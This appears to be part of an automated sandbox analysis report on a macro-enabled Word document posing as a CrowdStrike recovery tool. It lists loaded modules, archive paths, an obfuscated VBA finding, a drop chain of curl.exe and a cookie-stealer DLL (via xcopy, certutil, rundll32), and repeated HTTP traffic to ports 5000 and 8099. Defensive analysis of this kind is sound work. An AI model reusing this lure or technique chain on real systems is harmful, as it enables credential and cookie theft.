Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
Source: Templates.LNK.0.drLNK file: ..\..\Templates
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK.0.drLNK file: ..\..\..\..\..\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = word/media/image1.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = word/media/image2.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = word/media/image3.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = docProps/custom.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item3.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image2.jpg
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image10.jpeg
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.26.drInitial sample: OLE zip file path = word/media/image1.jpg
Source: ~WRC0000.tmp.26.drInitial sample: OLE zip file path = word/media/image2.jpg
Source: ~WRC0000.tmp.26.drInitial sample: OLE zip file path = word/media/image3.jpg
Source: ~WRC0000.tmp.26.drInitial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: Binary string: curl.pdb source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: D:\c++\Mal_Cookie_x64\x64\Release\mscorsvc.pdb source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp
Source: Element design set.dotx.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module ThisDocument
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0087D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,
Source: mscorsvc.dll.14.drStatic PE information: section name: _RDATA
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C4A381 push rdx; ret
Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\certutil.exeFile created: C:\Users\user\AppData\Local\Temp\mscorsvc.dll

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 8099
Source: unknownNetwork traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 8099
Source: unknownNetwork traffic detected: HTTP traffic on port 8099 -> 49195
Source: unknownNetwork traffic detected: HTTP traffic on port 49209 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49209
Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49210
Source: unknownNetwork traffic detected: HTTP traffic on port 49211 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49211
Source: unknownNetwork traffic detected: HTTP traffic on port 49212 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 49214 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49214
Source: unknownNetwork traffic detected: HTTP traffic on port 49215 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49215
Source: unknownNetwork traffic detected: HTTP traffic on port 49216 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49216
Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49218
Source: unknownNetwork traffic detected: HTTP traffic on port 49219 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49219
Source: unknownNetwork traffic detected: HTTP traffic on port 49220 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49220
Source: unknownNetwork traffic detected: HTTP traffic on port 49221 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49221
Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49222
Source: unknownNetwork traffic detected: HTTP traffic on port 49223 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49223
Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49224
Source: unknownNetwork traffic detected: HTTP traffic on port 49225 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49225
Source: unknownNetwork traffic detected: HTTP traffic on port 49226 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49226
Source: unknownNetwork traffic detected: HTTP traffic on port 49227 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49227
Source: unknownNetwork traffic detected: HTTP traffic on port 49228 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49228
Source: unknownNetwork traffic detected: HTTP traffic on port 49229 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49229
Source: unknownNetwork traffic detected: HTTP traffic on port 49230 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49230
Source: unknownNetwork traffic detected: HTTP traffic on port 49231 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49231
Source: unknownNetwork traffic detected: HTTP traffic on port 49232 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49232
Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49234
Source: unknownNetwork traffic detected: HTTP traffic on port 49235 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49235
Source: unknownNetwork traffic detected: HTTP traffic on port 49236 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49236
Source: unknownNetwork traffic detected: HTTP traffic on port 49237 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49237
Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49238
Source: unknownNetwork traffic detected: HTTP traffic on port 49239 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49239
Source: unknownNetwork traffic detected: HTTP traffic on port 49240 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49240
Source: unknownNetwork traffic detected: HTTP traffic on port 49241 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49241
Source: unknownNetwork traffic detected: HTTP traffic on port 49242 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49242
Source: unknownNetwork traffic detected: HTTP traffic on port 49243 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49243
Source: unknownNetwork traffic detected: HTTP traffic on port 49244 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49244
Source: unknownNetwork traffic detected: HTTP traffic on port 49245 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49245
Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49246
Source: unknownNetwork traffic detected: HTTP traffic on port 49247 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49247
Source: unknownNetwork traffic detected: HTTP traffic on port 49248 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49248
Source: unknownNetwork traffic detected: HTTP traffic on port 49249 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49249
Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49250
Source: unknownNetwork traffic detected: HTTP traffic on port 49251 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49251
Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49252
Source: unknownNetwork traffic detected: HTTP traffic on port 49253 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49253
Source: unknownNetwork traffic detected: HTTP traffic on port 49254 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49254
Source: unknownNetwork traffic detected: HTTP traffic on port 49255 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49255
Source: unknownNetwork traffic detected: HTTP traffic on port 49256 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49256
Source: unknownNetwork traffic detected: HTTP traffic on port 49257 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49257
Source: unknownNetwork traffic detected: HTTP traffic on port 49258 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49258
Source: unknownNetwork traffic detected: HTTP traffic on port 49259 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49259
Source: unknownNetwork traffic detected: HTTP traffic on port 49260 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49260
Source: unknownNetwork traffic detected: HTTP traffic on port 49261 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49261
Source: unknownNetwork traffic detected: HTTP traffic on port 49262 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49262
Source: unknownNetwork traffic detected: HTTP traffic on port 49263 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49263
Source: unknownNetwork traffic detected: HTTP traffic on port 49264 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49264
Source: unknownNetwork traffic detected: HTTP traffic on port 49265 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49265
Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49266
Source: unknownNetwork traffic detected: HTTP traffic on port 49267 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49267
Source: unknownNetwork traffic detected: HTTP traffic on port 49269 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 49271 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49271
Source: unknownNetwork traffic detected: HTTP traffic on port 49272 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49272
Source: unknownNetwork traffic detected: HTTP traffic on port 49273 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49273
Source: unknownNetwork traffic detected: HTTP traffic on port 49274 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49274
Source: unknownNetwork traffic detected: HTTP traffic on port 49275 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49275
Source: unknownNetwork traffic detected: HTTP traffic on port 49276 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49276
Source: unknownNetwork traffic detected: HTTP traffic on port 49277 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknownNetwork traffic detected: HTTP traffic on port 49279 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49279
Source: unknownNetwork traffic detected: HTTP traffic on port 49280 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49280
Source: unknownNetwork traffic detected: HTTP traffic on port 49281 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49281
Source: unknownNetwork traffic detected: HTTP traffic on port 49282 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49282
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49284
Source: unknownNetwork traffic detected: HTTP traffic on port 49285 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 49287 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49287
Source: unknownNetwork traffic detected: HTTP traffic on port 49288 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49288
Source: unknownNetwork traffic detected: HTTP traffic on port 49289 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49289
Source: unknownNetwork traffic detected: HTTP traffic on port 49290 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49290
Source: unknownNetwork traffic detected: HTTP traffic on port 49291 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49291
Source: unknownNetwork traffic detected: HTTP traffic on port 49292 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49292
Source: unknownNetwork traffic detected: HTTP traffic on port 49293 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49293
Source: unknownNetwork traffic detected: HTTP traffic on port 49294 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49294
Source: unknownNetwork traffic detected: HTTP traffic on port 49295 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49295
Source: unknownNetwork traffic detected: HTTP traffic on port 49296 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49296
Source: unknownNetwork traffic detected: HTTP traffic on port 49297 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49297
Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49298
Source: unknownNetwork traffic detected: HTTP traffic on port 49299 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49299
Source: unknownNetwork traffic detected: HTTP traffic on port 49300 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49300
Source: unknownNetwork traffic detected: HTTP traffic on port 49301 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49301
Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49302
Source: unknownNetwork traffic detected: HTTP traffic on port 49303 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49303
Source: unknownNetwork traffic detected: HTTP traffic on port 49304 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49304
Source: unknownNetwork traffic detected: HTTP traffic on port 49305 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49305
Source: unknownNetwork traffic detected: HTTP traffic on port 49306 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49306
Source: unknownNetwork traffic detected: HTTP traffic on port 49307 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49307
Source: unknownNetwork traffic detected: HTTP traffic on port 49308 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49308
Source: unknownNetwork traffic detected: HTTP traffic on port 49309 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49309
Source: unknownNetwork traffic detected: HTTP traffic on port 49310 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknownNetwork traffic detected: HTTP traffic on port 49311 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49311
Source: unknownNetwork traffic detected: HTTP traffic on port 49312 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49312
Source: unknownNetwork traffic detected: HTTP traffic on port 49313 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49313
Source: unknownNetwork traffic detected: HTTP traffic on port 49314 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49314
Source: unknownNetwork traffic detected: HTTP traffic on port 49315 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49315
Source: unknownNetwork traffic detected: HTTP traffic on port 49316 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49316
Source: unknownNetwork traffic detected: HTTP traffic on port 49317 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49317
